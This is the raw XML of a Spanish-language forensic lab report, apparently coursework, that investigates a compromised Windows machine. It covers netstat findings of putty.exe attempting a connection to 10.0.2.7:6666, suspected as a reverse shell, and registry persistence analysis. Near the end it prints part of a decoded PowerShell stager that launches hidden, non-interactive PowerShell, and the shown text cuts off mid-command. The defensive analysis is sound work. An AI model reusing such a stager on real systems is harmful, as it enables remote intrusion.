    <w:p w14:paraId="3C85F186" w14:textId="798F845B" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="11D59FBB" w14:textId="4B5D8866" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="5E46851F" w14:textId="526DEED2" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="5E6FD218" w14:textId="77777777" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="79637AB0" w14:textId="6BFA7CD2" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reviso el visor de eventos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039387F1" w14:textId="0620619B" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB">
      <w:r w:rsidRPr="006A1DA2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B9679DE" wp14:editId="09DD33FF">
            <wp:extent cx="5400040" cy="289941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99410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D31FB" w14:textId="0FDACDDF" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB">
      <w:r>
        <w:t>Veo que hay un servicio que dio error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5818AC8B" w14:textId="45A023BE" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB"/>
    <w:p w14:paraId="2B88024C" w14:textId="2B7E792E" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB">
      <w:r>
        <w:t>Reviso la carpeta TEMP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB9D86" w14:textId="02DBBA77" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB">
      <w:r w:rsidRPr="006A1DA2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A4C2E97" wp14:editId="12D939BC">
            <wp:extent cx="5400040" cy="28638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63850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="428D0F3E" w14:textId="388E9737" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="514BF3B8" w14:textId="69D1B268" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="2CB63472" w14:textId="6506CC22" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="50D22292" w14:textId="28851C4C" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="159B609C" w14:textId="77777777" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="3EBD0AB6" w14:textId="665A3A9E" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB"/>
    <w:p w14:paraId="2E87B4D0" w14:textId="6D589FFE" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reviso la configuración de sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEB1FB" w14:textId="549AAEB9" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB">
      <w:r w:rsidRPr="006A1DA2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2DBF28" wp14:editId="6B2D18A8">
            <wp:extent cx="5400040" cy="290766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907665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A858201" w14:textId="77777777" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00BA0A75"/>
    <w:p w14:paraId="4F2ADF59" w14:textId="3C5A2555" w:rsidR="00057EBB" w:rsidRDefault="006A1DA2" w:rsidP="00BA0A75">
      <w:r>
        <w:t xml:space="preserve">Revisando este apartado me encuentro </w:t>
      </w:r>
      <w:r w:rsidR="00CF199F">
        <w:t>en inicio de Windows varios elementos de inicio sospechosos, y obtengo su ubicación del registro de sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695714E7" w14:textId="04D601B7" w:rsidR="00CF199F" w:rsidRDefault="00ED1049" w:rsidP="00BA0A75">
      <w:r w:rsidRPr="00ED1049">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5954F59B" wp14:editId="5D4D2812">
            <wp:extent cx="5400040" cy="28911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91155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="210C7012" w14:textId="75342AEB" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00BA0A75"/>
    <w:p w14:paraId="6D5F650A" w14:textId="7FB43195" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00BA0A75"/>
    <w:p w14:paraId="3EDF1232" w14:textId="0EC9E5C1" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00BA0A75"/>
    <w:p w14:paraId="727FCB91" w14:textId="77777777" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00BA0A75"/>
    <w:p w14:paraId="7811336F" w14:textId="77777777" w:rsidR="0084442C" w:rsidRPr="00057EBB" w:rsidRDefault="0084442C" w:rsidP="00BA0A75"/>
    <w:p w14:paraId="225EDCDE" w14:textId="000BAE9C" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A908D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tras analizar las conexiones de red, ¿existen datos que confirmen una conexión o intento de conexión local hacia otra máquina de la red?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAC7915" w14:textId="132DC4A7" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t xml:space="preserve">Procedo a revisar </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y conexiones activas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FADFE48" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="00D86E37">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="593BABBA" wp14:editId="6137F1F5">
            <wp:extent cx="5400040" cy="29127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912745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31010053" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9"/>
    <w:p w14:paraId="0E7646C6" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t xml:space="preserve">Arranco </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>putty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y ejecuto el mismo comando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85CC81" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="00D86E37">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A4A39B8" wp14:editId="4C950908">
            <wp:extent cx="5400040" cy="28962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896235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A036202" w14:textId="363AE6B7" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t xml:space="preserve">Veo que se ejecuta una dirección remota 10.0.2.7:6666 con el PID 2428 y es estado SYN_SENT que significa que </w:t>
      </w:r>
      <w:r>
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a esperando conexión, me parece un ataque de reverse Shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED3A4D7" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t>Reviso ese PID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7867BC32" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="00A908D4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C8852CC" wp14:editId="64DD1C3F">
            <wp:extent cx="5400040" cy="290957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909570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EABC02D" w14:textId="03E72369" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="00A908D4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11918950" wp14:editId="174D6F2C">
            <wp:extent cx="5400040" cy="2905760"/>
            <wp:effectExtent l="0" t="0" r="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905760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="554636CE" w14:textId="08D5AB69" w:rsidR="009F7434" w:rsidRDefault="009F7434" w:rsidP="00CC32D9">
      <w:r>
        <w:t xml:space="preserve">Podemos ver que es </w:t>
      </w:r>
      <w:r w:rsidR="00227A5A">
        <w:t xml:space="preserve">del proceso </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00227A5A">
        <w:t>putty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00227A5A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF85B7B" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t>Ejecuto varios comandos recomendados para revisar el cache de DNS, rutas ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA756C" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displaydns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26D76DC1" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A3D76" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>route</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B365922" w14:textId="0EEBB610" w:rsidR="00CC32D9" w:rsidRPr="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="00A908D4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10AEABCD" wp14:editId="18018F86">
            <wp:extent cx="5400040" cy="28854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885440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE3DA45" w14:textId="0E1731AA" w:rsidR="00A908D4" w:rsidRDefault="00A908D4" w:rsidP="00A908D4">
      <w:r>
        <w:t>Si, como hemos podido ver en una foto anterior, se está intentando realizar una conexión desde una dirección remota</w:t>
      </w:r>
      <w:r w:rsidR="00CC32D9">
        <w:t xml:space="preserve"> 10.0.2.7 con puerto 6666 al ejecutar putty.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD9076C" w14:textId="77777777" w:rsidR="008A71F8" w:rsidRPr="00A908D4" w:rsidRDefault="008A71F8" w:rsidP="00A908D4"/>
    <w:p w14:paraId="2C4BF34C" w14:textId="02E94AEB" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC32D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tras analizar la red, si se han descubierto intentos de conexión es muy probable que estén provocados por intentos de persistencia de un ataque perpetrado tras apagados de la máquina. Intenta localizar evidencias del intento de persistencia mediante un análisis del registro de Windows localizando el servicio que activa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEBCE7F" w14:textId="72B2231D" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317CDFF2" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t>Accedo a revisar esos elementos en el registro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA8045C" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="007C36FB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38E628FE" wp14:editId="70BF763B">
            <wp:extent cx="5400040" cy="28587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858770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBBEECD" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9"/>
    <w:p w14:paraId="7AC4FCD8" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Revisando todo el registro también encuentro esta carpeta que me resulta rara.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7224EA85" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="007C36FB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C27AD17" wp14:editId="19284EB5">
            <wp:extent cx="5400040" cy="290830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908300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D45DA7E" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9"/>
    <w:p w14:paraId="4BDBD616" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t xml:space="preserve">Exporto el archivo y lo reviso, además le pregunto a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chatGPT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que tipo de formato es ese dato y me dice que está en BASE64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB0DA51" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="007C36FB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A603944" wp14:editId="1881B26F">
            <wp:extent cx="5400040" cy="2892425"/>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892425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB42479" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9"/>
    <w:p w14:paraId="4BE827FF" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t>Decodifico los datos BASE64, utilizo una de muchas webs y tengo el comando de ejecución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24534D03" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r w:rsidRPr="0084442C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42A6FFCD" wp14:editId="1BB02D26">
            <wp:extent cx="5400040" cy="275780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757805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABE2ABB" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9"/>
    <w:p w14:paraId="5C7A1C14" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:r>
        <w:t xml:space="preserve">Ejecuta un comando en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5394046E" w14:textId="77777777" w:rsidR="00CC32D9" w:rsidRPr="0084442C" w:rsidRDefault="00CC32D9" w:rsidP="00CC32D9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="23272E"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C678DD"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C678DD"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>IntPtr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>eq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>$b</w:t>
      </w:r>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084442C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c &amp;([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
